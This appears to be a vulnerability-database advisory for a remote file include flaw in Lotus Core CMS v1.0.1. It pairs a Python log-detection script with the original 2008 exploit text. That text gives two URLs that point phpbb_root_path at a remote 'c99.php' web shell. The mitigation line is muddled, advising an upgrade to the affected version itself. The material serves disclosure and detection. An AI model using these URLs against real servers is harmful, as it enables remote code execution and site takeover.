Vendor: Lotus Core CMS
By: Ciph3r
CVSS: 9.3 HIGH
Remote File Include
CWE: 98
Product Name: Lotus Core CMS
Affected Version From: 1.0.1
Affected Version To: 1.0.1
Patch Exists: YES
Related CWE: N/A
CPE: a:lotus_core:lotus_core_cms:1.0.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

[phpbb3] Lotus Core CMS v1.0.1 Remote File Include Vulnerabilities

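A remote file include vulnerability exists in Lotus Core CMS v1.0.1. The value of phpbb_root_path is concatenated into a PHP include() call, include($phpbb_root_path . 'includes/bbcode.' . $phpEx);, and can be set through the query string of system/plugins/index.php and system/plugins/error/404.php. An attacker can exploit this vulnerability to include a remote file containing malicious code and execute it on the vulnerable system by sending a specially crafted HTTP request that points phpbb_root_path at that file.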

Mitigation:

Upgrade to the latest version of Lotus Core CMS v1.0.1 or apply the patch from the vendor.
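
Detection example (added here, not part of the original advisory or of Lotus Core CMS): a log check that flags requests whose phpbb_root_path query parameter points at a remote or wrapper resource instead of a local directory. The access-log format, the sample lines and the scheme pattern are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

PARAM = "phpbb_root_path"  # parameter named in the advisory
# Assumption: a legitimate value is a relative local path, so any URL scheme,
# protocol-relative "//" prefix or UNC "\\" prefix is treated as suspicious.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def remote_include_attempts(log_lines):
    """Return (line_no, decoded_path, decoded_value) for each suspicious request."""
    hits = []
    for no, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        target = urlsplit(m.group(1))
        # parse_qsl percent-decodes each value once
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if name != PARAM:
                continue
            # decode a second time to catch double-encoded values (%2568ttp -> http)
            decoded = unquote(value)
            if REMOTE.match(value) or REMOTE.match(decoded):
                hits.append((no, unquote(target.path), decoded))
    return hits

# Constructed access-log lines (documentation addresses, reserved host name)
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Jun/2008:10:00:01 +0000] "GET /cms/Lotus%20Core%20v1.0.1/'
    'system/plugins/index.php?phpbb_root_path=http://example.invalid/x.txt? HTTP/1.1" 200 512',
    '203.0.113.5 - - [19/Jun/2008:10:00:02 +0000] "GET /cms/Lotus%20Core%20v1.0.1/'
    'system/plugins/error/404.php?phpbb_root_path=%2568ttp%253A%252F%252Fexample.invalid%252Fx'
    ' HTTP/1.1" 200 512',
    '198.51.100.7 - - [19/Jun/2008:10:00:03 +0000] "GET /cms/Lotus%20Core%20v1.0.1/'
    'index.php?page=news HTTP/1.1" 200 2048',
    '198.51.100.7 - - [19/Jun/2008:10:00:04 +0000] "GET /forum/viewtopic.php?'
    'phpbb_root_path=./ HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for no, path, value in remote_include_attempts(SAMPLE_LOG):
        print(f"line {no}: {path} <- {PARAM}={value}")
```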

Exploit-DB raw data:

###############################################################
#
# [phpbb3] Lotus Core CMS v1.0.1 Remote File Include Vulnerabilities 
#
###############################################################
#
# Discovered by : Ciph3r
#
#
# MAIL : Ciph3r_blackhat@yahoo.com
#
#
# SP TANX4 : Iranian hacker & Kurdish Security TEAM 
#
# CLASS : remote
#
# download cms: http://sourceforge.net/project/showfiles.php?group_id=215112
#
################################################################
#
# C0de : 
#                
#                  
#    include($phpbb_root_path . 'includes/bbcode.' . $phpEx);
#       
#        
###############################################################

EXPLOIT :

 
 http://127.0.0.1/cms/Lotus%20Core%20v1.0.1/system/plugins/index.php?phpbb_root_path=http://127.0.0.1/c99.php?
 
 http://127.0.0.1/cms/Lotus%20Core%20v1.0.1/system/plugins/error/404.php?phpbb_root_path=http://127.0.0.1/c99.php?


#####################################################################

# milw0rm.com [2008-06-19]